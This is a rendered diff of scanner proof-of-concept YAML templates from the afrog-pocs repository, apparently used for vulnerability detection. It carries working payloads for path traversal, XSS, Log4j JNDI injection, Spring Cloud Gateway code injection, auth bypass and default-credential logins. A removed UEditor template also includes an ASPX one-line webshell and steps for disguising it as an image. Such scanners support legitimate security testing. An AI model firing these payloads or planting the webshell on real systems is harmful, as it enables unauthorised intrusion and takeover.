AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\|http://baidu.com/api/v1/targets
28		-	follow_redirects: false
29	18		expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
30	19		expression: r0()
31	20

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/exchange-cve-2021-41349-xss.yml afrog-pocs/CVE/2021/CVE-2021-41349.yaml

1		-	id: exchange-cve-2021-41349-xss
	1	+	id: CVE-2021-41349
2	2
3	3		info:
4		-	name: exchange-cve-2021-41349-xss
	4	+	name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
5	5		author: zhibing(https://github.com/azhibing)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
		skipped 4 lines
17	15		body: <script>alert(1);+"=</script>
18	16		expression: \|
19	17		response.status == 500 && response.body.bcontains(b"<script>alert(1)")
20		-	expression:
21		-	r0()
	18	+	expression: r0()
22	19
23	20

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-41773.yml afrog-pocs/CVE/2021/CVE-2021-41773.yaml

		skipped 4 lines
5	5		author: daffainfo
6	6		severity: high
7	7		description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
8		-	remediation: Update to Apache HTTP Server 2.4.50 or later.
9	8		reference:
10	9		- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
11	10		- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
		skipped 1 lines
13	12		- https://twitter.com/ptswarm/status/1445376079548624899
14	13		- https://twitter.com/h4x0r_dz/status/1445401960371429381
15	14		- https://github.com/blasty/CVE-2021-41773
16		-	tags: cve,cve2021,lfi,rce,apache,misconfig,traversal
17		-	classification:
18		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
19		-	cvss-score: 7.50
20		-	cve-id: CVE-2021-41773
21		-	cwe-id: CWE-22
22		-	metadata:
23		-	shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
24	15
25		-	manual: true
26		-	transport: http
27	16		rules:
28	17		cgibin0:
29	18		request:
		skipped 11 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/gocd-cve-2021-43287.yml afrog-pocs/CVE/2021/CVE-2021-43287.yaml

1		-	id: gocd-cve-2021-43287
	1	+	id: CVE-2021-43287
2	2
3	3		info:
4		-	name: gocd-cve-2021-43287
	4	+	name: Pre-Auth Takeover of Build Pipelines in GoCD
5	5		author: For3stCo1d (https://github.com/For3stCo1d)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		linux0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd
16		-	follow_redirects: false
17	13		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
18	14		windows0:
19	15		request:
20		-	cache: true
21	16		method: GET
22	17		path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini
23		-	follow_redirects: false
24	18		expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") \|\| response.body.bcontains(b"[extensions]"))
25	19		expression: windows0() \|\| linux0()
26	20

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-44228.yaml afrog-pocs/CVE/2021/CVE-2021-44228.yaml

		skipped 4 lines
5	5		author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
6	6		severity: critical
7	7		description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
8		-	remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
9	8		reference:
10	9		- https://logging.apache.org/log4j/2.x/security.html
11	10		- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
12	11		- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
13	12		- https://www.lunasec.io/docs/blog/log4j-zero-day/
14	13		- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
15		-	tags: cve,cve2021,rce,oast,log4j,injection
16		-	classification:
17		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
18		-	cvss-score: 10.00
19		-	cve-id: CVE-2021-44228
20		-	cwe-id: CWE-502
21	14
22	15		set:
23	16		reverse: newReverse()
24	17		reverseURL: reverse.url
25		-	manual: true
26		-	transport: http
27	18		rules:
28	19		r0:
29	20		request:
30		-	cache: true
31	21		method: GET
32	22		path: /?x=${jndi:ldap://{{reverseURL}}/a}
33	23		headers:
		skipped 21 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/Spring-Cloud-Gateway-Code-Injection-CVE-2022-22947.yml afrog-pocs/CVE/2022/CVE-2022-22947.yaml

1		-	id: Spring-Cloud-Gateway-Code-Injection-CVE-2022-22947
	1	+	id: CVE-2022-22947
2	2
3	3		info:
4	4		name: Spring Cloud Gateway Code Injection
		skipped 2 lines
7	7		tags: spring,spring-cloud,cloud,cve2022
8	8		reference:
9	9		- https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
10		-	classification:
11		-	cve-id: CVE-2022-22947
12	10
13		-	transport: http
14	11		set:
15	12		router: randomLowercase(8)
16	13		rand1: randomInt(800000000, 1000000000)
		skipped 1 lines
18	15		rules:
19	16		r0:
20	17		request:
21		-	cache: true
22	18		method: POST
23	19		path: /actuator/gateway/routes/{{router}}
24	20		headers:
		skipped 12 lines
37	33
38	34		r1:
39	35		request:
40		-	cache: true
41	36		method: POST
42	37		path: /actuator/gateway/refresh
43	38		headers:
		skipped 2 lines
46	41
47	42		r2:
48	43		request:
49		-	cache: true
50	44		method: GET
51	45		path: /actuator/gateway/routes/{{router}}
52	46		headers:
		skipped 2 lines
55	49
56	50		r3:
57	51		request:
58		-	cache: true
59	52		method: DELETE
60	53		path: /actuator/gateway/routes/{{router}}
61	54		expression: response.status == 200
62	55
63	56		r4:
64	57		request:
65		-	cache: true
66	58		method: POST
67	59		path: /actuator/gateway/refresh
68	60		headers:
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-23131.yaml afrog-pocs/CVE/2022/CVE-2022-23131.yaml

		skipped 4 lines
5	5		author: For3stCo1d
6	6		severity: critical
7	7		description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
8		-	remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
9	8		reference:
10	9		- https://support.zabbix.com/browse/ZBX-20350
11	10		- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
12	11		- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
13	12		- https://github.com/1mxml/CVE-2022-23131
14		-	metadata:
15		-	shodan-query: http.favicon.hash:892542951
16		-	fofa-query: app="ZABBIX-监控系统" && body="saml"
17		-	classification:
18		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
19		-	cvss-score: 9.8
20		-	cve-id: CVE-2022-23131
21		-	tags: cve,cve2022,zabbix,auth-bypass,saml,sso
22	13
23		-	transport: http
24	14		rules:
25	15		r0:
26	16		request:
		skipped 14 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-23134.yaml afrog-pocs/CVE/2022/CVE-2022-23134.yaml

		skipped 7 lines
8	8		reference:
9	9		- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
10	10		- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
11		-	classification:
12		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
13		-	cvss-score: 5.3
14		-	cve-id: CVE-2022-23134
15		-	tags: cve,cve2022,zabbix,auth-bypass
16	11
17	12		rules:
18	13		r0:
		skipped 16 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-23178.yaml afrog-pocs/CVE/2022/CVE-2022-23178.yaml

		skipped 8 lines
9	9		- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
10	10		- https://nvd.nist.gov/vuln/detail/CVE-2022-23178
11	11		- https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
12		-	tags: cve,cve2022,crestron,disclosure
13		-	classification:
14		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15		-	cvss-score: 9.80
16		-	cve-id: CVE-2022-23178
17		-	cwe-id: CWE-287
18	12
19		-	transport: http
20	13		rules:
21	14		r0:
22	15		request:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-24112.yaml afrog-pocs/CVE/2022/CVE-2022-24112.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Apache APISIX apisix/batch-requests RCE
5		-	description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
6	5		author: Mr-xn
7	6		severity: critical
	7	+	description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
8	8		reference:
9	9		- https://nvd.nist.gov/vuln/detail/CVE-2022-24112
10	10		- https://www.openwall.com/lists/oss-security/2022/02/11/3
11	11		- https://twitter.com/sirifu4k1/status/1496043663704858625
12	12		- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
13		-	metadata:
14		-	shodan-query: title:"Apache APISIX Dashboard"
15		-	fofa-query: title="Apache APISIX Dashboard"
16		-	product: https://apisix.apache.org
17		-	classification:
18		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
19		-	cvss-score: 9.80
20		-	cve-id: CVE-2022-24112
21		-	cwe-id: CWE-290
22		-	tags: cve,cve2022,apache,rce,apisix,oast
23	13
24	14		set:
25	15		randstr: randomLowercase(6)
26	16		reverse: newReverse()
27	17		reverseURL: reverse.url
28		-	transport: http
29	18		rules:
30	19		r0:
31	20		request:
		skipped 33 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-24124.yaml afrog-pocs/CVE/2022/CVE-2022-24124.yaml

		skipped 12 lines
13	13		- https://www.exploit-db.com/exploits/50792
14	14		- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
15	15		- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
16		-	classification:
17		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
18		-	cvss-score: 7.5
19		-	cve-id: CVE-2022-24124
20		-	cwe-id: CWE-89
21		-	tags: cve,cve2022,casdoor,sqli,unauth
22	16
23		-
24		-	transport: http
25	17		rules:
26	18		r0:
27	19		request:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-24260.yaml afrog-pocs/CVE/2022/CVE-2022-24260.yaml

		skipped 10 lines
11	11		- https://kerbit.io/research/read/blog/3
12	12		- https://nvd.nist.gov/vuln/detail/CVE-2022-24260
13	13		- https://www.voipmonitor.org/changelog-gui?major=5
14		-	classification:
15		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
16		-	cvss-score: 9.80
17		-	cve-id: CVE-2022-24260
18		-	cwe-id: CWE-89
19		-	tags: cve,cve2022,voipmonitor,sqli,unauth
20	14
21		-	transport: http
22	15		rules:
23	16		r0:
24	17		request:
		skipped 9 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-24990.yaml afrog-pocs/CVE/2022/CVE-2022-24990.yaml

		skipped 10 lines
11	11		- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990
12	12		- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E%20CVE-2022-24990.md
13	13		- https://github.com/lishang520/CVE-2022-24990
14		-	manual: true
15		-	transport: http
	14	+
16	15		rules:
17	16		r0:
18	17		request:
19		-	cache: true
20	18		method: GET
21	19		path: /module/api.php?mobile/webNasIPS
22	20		headers:
23	21		User-Agent: TNAS
24		-	follow_redirects: false
25	22		expression: \|
26	23		response.status == 200 && response.body.bcontains(b'"code":true') && response.body.bcontains(b'"msg":"webNasIPS successful"')
27	24		expression: r0()

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2022/CVE-2022-25369.yaml afrog-pocs/CVE/2022/CVE-2022-25369.yaml

		skipped 4 lines
5	5		author: pdteam
6	6		severity: critical
7	7		description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
8		-	remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0."
9	8		reference:
10	9		- https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
11	10		- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
12		-	metadata:
13		-	shodan-query: http.component:"Dynamicweb"
14		-	tags: cve,cve2022,dynamicweb,rce,unauth
15		-	classification:
16		-	cve-id: CVE-2022-25369
17		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
18		-	cvss-score: 9.8
19		-	cwe-id: CWE-425
20	11
21		-	transport: http
22	12		rules:
23	13		r0:
24	14		request:
		skipped 5 lines

afrog-pocs/cve/2022/CVE-2022-25568.yaml afrog-pocs/CVE/2022/CVE-2022-25568.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/cnvd/2017/ueditor-cnvd-2017-20077-file-upload.yaml

1	-	id: ueditor-cnvd-2017-20077-file-upload
2	-
3	-	info:
4	-	name: ueditor-cnvd-2017-20077-file-upload
5	-	author: zan8in
6	-	severity: critical
7	-	description: \|
8	-	<form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
9	-	<p>shell addr: <input type="text" name="source[]" style="width:600px"/></p>
10	-	<input type="submit" value="Submit" />
11	-	</form>
12	-	http://vps/11.jpg?.aspx 11.jpg是图片马；制作图片马：copy 1.jpg/b +2.aspx 3.aspx
13	-	aspx一句话：<%@ Page Language="Jscript"%><%eval(Request.Item["zan8in"],"unsafe");%>
14	-	reference:
15	-	- https://zhuanlan.zhihu.com/p/85265552
16	-	- https://www.freebuf.com/vuls/181814.html
17	-	tags: ueditor,cnvd,file-upload
18	-
19	-	manual: true
20	-	transport: http
21	-	rules:
22	-	r0:
23	-	request:
24	-	cache: true
25	-	method: GET
26	-	path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
27	-	headers:
28	-	Accept-Encoding: 'deflate'
29	-	follow_redirects: false
30	-	expression: \|
31	-	response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
32	-	expression: r0()

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2018/uwsgi-cve-2018-7490.yml

1	-	id: uwsgi-cve-2018-7490
2	-
3	-	info:
4	-	name: uWSGI PHP Plugin Directory Traversal
5	-	author: madrobot
6	-	severity: high
7	-	tags: cve,cve2018,uwsgi,php,lfi,plugin
8	-	classification:
9	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
10	-	cvss-score: 7.50
11	-	cve-id: CVE-2018-7490
12	-	cwe-id: CWE-22
13	-	description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal."
14	-	reference:
15	-	- https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
16	-	- https://www.exploit-db.com/exploits/44223/
17	-	- https://www.debian.org/security/2018/dsa-4142
18	-
19	-	manual: true
20	-	transport: http
21	-	rules:
22	-	r0:
23	-	request:
24	-	cache: true
25	-	method: GET
26	-	path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
27	-	follow_redirects: false
28	-	expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
29	-	expression: r0()
30	-

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/jira-cve-2019-8442.yml

1	-	id: jira-cve-2019-8442
2	-
3	-	info:
4	-	name: jira-cve-2019-8442
5	-	author: pa55w0rd(www.pa55w0rd.online/)
6	-	severity: high
7	-
8	-	transport: http
9	-	rules:
10	-	r0:
11	-	request:
12	-	method: GET
13	-	path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
14	-	expression: response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
15	-	expression: r0()
16	-
17	-

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/--CVE-2021-33044.yaml

1	-	id: CVE-2021-33044
2	-
3	-	info:
4	-	name: Dahua IPC/VTH/VTO devices Authentication Bypass
5	-	author: gy741
6	-	severity: critical
7	-	description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
8	-	reference:
9	-	- https://github.com/dorkerdevil/CVE-2021-33044
10	-	- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
11	-	- https://seclists.org/fulldisclosure/2021/Oct/13
12	-	classification:
13	-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
14	-	cvss-score: 9.80
15	-	cve-id: CVE-2021-33044
16	-	cwe-id: CWE-287
17	-	tags: dahua,cve,cve2021,auth-bypass
18	-
19	-	transport: http
20	-	set:
21	-	hosturl: request.url
22	-	hostname: request.url.host
23	-	rules:
24	-	r0:
25	-	request:
26	-	cache: true
27	-	method: POST
28	-	path: /api/v4/ci/lint
29	-	headers:
30	-	Host: "{{hostname}}"
31	-	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
32	-	Accept: application/json, text/javascript, /; q=0.01
33	-	X-Requested-With: XMLHttpRequest
34	-	Connection: close
35	-	Origin: "{{hosturl}}"
36	-	Referer: "{{hosturl}}"
37	-	body: \|
38	-	{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
39	-	expression: response.status == 200 && response.body.bcontains(b'"result":true') && response.body.bcontains(b'id') && response.body.bcontains(b'params') && response.body.bcontains(b'session')
40	-	expression: r0()
41	-

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-22214.yml

1	-	id: CVE-2021-22214
2	-
3	-	info:
4	-	name: gitlab-ssrf-cve-2021-22214
5	-	author: mumu0215(https://github.com/mumu0215)
6	-	severity: high
7	-	reference:
8	-	- https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ
9	-
10	-	manual: true
11	-	transport: http
12	-	rules:
13	-	r0:
14	-	request:
15	-	cache: true
16	-	method: POST
17	-	path: /api/v4/ci/lint
18	-	headers:
19	-	Content-Type: application/json
20	-	body: \|
21	-	{"include_merged_yaml": true, "content": "include:\n remote: http://baidu.com/api/v1/targets/?test.yml"}
22	-	expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") \|\| response.body.bcontains(b"could not be fetched"))
23	-	expression: r0()
24	-
25	-

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/activemq-default-password.yml afrog-pocs/default-pwd/activemq-default-password.yaml

1	1		id: activemq-default-password
2	2
3	3		info:
4		-	name: activemq-default-password
	4	+	name: ActiveMQ Default Password
5	5		author: pa55w0rd(www.pa55w0rd.online/)
6	6		severity: high
	7	+
7	8		set:
8	9		admin: "base64('admin:admin')"
9	10		user: "base64('user:user')"
10		-	manual: true
11		-	transport: http
12	11		rules:
13		-	r11:
	12	+	r0:
14	13		request:
15		-	todo: TODO_FAILURE_NOT_CONTINUE
16	14		method: GET
17	15		path: /
18	16		expression: response.status == 200 && response.body.bcontains(b"<h2>Welcome to the Apache ActiveMQ!</h2>") && response.body.bcontains(b"<title>Apache ActiveMQ</title>")
19		-	r0:
	17	+	stop_if_mismatch: true
	18	+	r1:
20	19		request:
21		-	todo: TODO_SUCCESS_NOT_CONTINUE
22	20		method: GET
23	21		path: /admin/
24	22		headers:
25	23		Authorization: Basic {{admin}}
26	24		expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
27		-	r1:
	25	+	stop_if_match: true
	26	+	r2:
28	27		request:
29		-	todo: TODO_SUCCESS_NOT_CONTINUE
30	28		method: GET
31	29		path: /admin/
32	30		headers:
33	31		Authorization: Basic {{user}}
34	32		expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
35		-	expression: r11() && (r0() \|\| r1())
	33	+	stop_if_match: true
	34	+	expression: r0() && (r1() \|\| r2())
36	35

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/alibaba-canal-default-password.yml afrog-pocs/default-pwd/alibaba-canal-default-password.yaml

1	1		id: alibaba-canal-default-password
2	2
3	3		info:
4		-	name: alibaba-canal-default-password
	4	+	name: Alibaba Canal Default Password
5	5		author: jweny(https://github.com/jweny)
6	6		severity: high
7	7		description: fofa title="Canal Admin"
8	8
9		-	manual: true
10		-	transport: http
11	9		rules:
12	10		r1:
13	11		request:
14		-	cache: true
15	12		method: POST
16	13		path: /api/v1/user/login
17	14		headers:
18	15		Content-Type: application/json
19	16		body: '{"username":"admin","password":"123456"}'
20		-	follow_redirects: false
21	17		expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
22	18		expression: r1()
23	19

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/apache-ambari-default-password.yml afrog-pocs/default-pwd/ambari-default-password.yaml

1		-	id: apache-ambari-default-password
	1	+	id: ambari-default-password
2	2
3	3		info:
4		-	name: apache-ambari-default-password
	4	+	name: Apache Ambari Default Password
5	5		author: wulalalaaa(https://github.com/wulalalaaa)
6	6		severity: high
7	7		description: \|
8	8		fofa app="APACHE-Ambari" admin/admin
9	9
10		-	manual: true
11		-	transport: http
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
18	15		headers:
		skipped 4 lines

afrog-pocs/login/default-pwd/chinaunicom-default-login.yaml afrog-pocs/default-pwd/chinaunicom-default-login.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/chinaunicom-modem-default-password.yml afrog-pocs/default-pwd/chinaunicom-modem-default-password.yaml

1	1		id: chinaunicom-modem-default-password
2	2
3	3		info:
4		-	name: chinaunicom-modem-default-password
5		-	author:
	4	+	name: Chinaunicom Modem Default Password
	5	+	author: unkown
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /cu.html
16	13		body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
17		-	follow_redirects: false
18	14		expression: response.status == 302 && response.headers["location"] == "/menu.gch"
19	15		expression: r0()
20	16

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/datang-ac-default-password-cnvd-2021-04128.yml afrog-pocs/default-pwd/datang-ac-default-password-cnvd-2021-04128.yaml

1		-	id: datang-ac-default-password-cnvd-2021-04128
	1	+	id: datang-ac-default-password-CNVD-2021-04128
2	2
3	3		info:
4		-	name: datang-ac-default-password-cnvd-2021-04128
	4	+	name: datang-ac-default-password-CNVD-2021-04128
5	5		author: B1anda0(https://github.com/B1anda0)
6	6		severity: high
7	7
		skipped 14 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/dlink-default-password.yml afrog-pocs/default-pwd/dlink-default-password.yaml

1	1		id: dlink-default-password
2	2
3	3		info:
4		-	name: dlink-default-password
	4	+	name: DLink Default Password
5	5		author: zan8in
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /login.cgi
16	13		body: \|
17	14		tm=1647092159.427&user=admin&password=admin&selectLanguage=CH&OKBTN=%E7%99%BB%E5%BD%95
18		-	follow_redirects: false
19	15		expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?")
20	16		expression: r0()
21	17
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/dubbo-admin-default-password.yml afrog-pocs/default-pwd/dubbo-admin-default-password.yaml

1	1		id: dubbo-admin-default-password
2	2
3	3		info:
4		-	name: dubbo-admin-default-password
	4	+	name: Dubbo Admin Default Password
5	5		author: mumu0215(https://github.com/mumu0215)
6	6		severity: high
7	7		description: \|
8	8		fofa-query: app="APACHE-dubbo"
9	9
10		-	transport: http
11	10		rules:
12	11		guest0:
13	12		request:
		skipped 14 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/gitlab-weak-login.yml afrog-pocs/default-pwd/gitlab-weak-login.yaml

		skipped 4 lines
5	5		author: Suman_Kar,dwisiswant0
6	6		severity: high
7	7		description: Gitlab default login credentials were discovered.
8		-	tags: gitlab,default-login
9	8		reference:
10	9		- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
11	10		- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
12		-	metadata:
13		-	shodan-query: http.title:"GitLab"
14		-	classification:
15		-	cwe-id: CWE-798
16	11
17	12		set:
18	13		hostname: request.url.host
19	14		hosturl: request.url
20		-
21		-	manual: true
22		-	transport: http
23	15		rules:
24	16		r0:
25	17		request:
26		-	cache: true
27	18		method: POST
28	19		path: /oauth/token
29	20		headers:
		skipped 3 lines
33	24		content-type: application/json
34	25		body: \|
35	26		{"grant_type":"password","username":"root","password":"5iveL!fe"}
36		-	follow_redirects: false
37	27		expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
38	28		r1:
39	29		request:
40		-	cache: true
41	30		method: POST
42	31		path: /oauth/token
43	32		headers:
		skipped 3 lines
47	36		content-type: application/json
48	37		body: \|
49	38		{"grant_type":"password","username":"root","password":"123456789"}
50		-	follow_redirects: false
51	39		expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
52	40		r2:
53	41		request:
54		-	cache: true
55	42		method: POST
56	43		path: /oauth/token
57	44		headers:
		skipped 3 lines
61	48		content-type: application/json
62	49		body: \|
63	50		{"grant_type":"password","username":"admin","password":"5iveL!fe"}
64		-	follow_redirects: false
65	51		expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
66	52		r3:
67	53		request:
68		-	cache: true
69	54		method: POST
70	55		path: /oauth/token
71	56		headers:
		skipped 3 lines
75	60		content-type: application/json
76	61		body: \|
77	62		{"grant_type":"password","username":"admin","password":"123456789"}
78		-	follow_redirects: false
79	63		expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
80	64		r4:
81	65		request:
82		-	cache: true
83	66		method: POST
84	67		path: /oauth/token
85	68		headers:
		skipped 3 lines
89	72		content-type: application/json
90	73		body: \|
91	74		{"grant_type":"password","username":"[email protected]","password":"5iveL!fe"}
92		-	follow_redirects: false
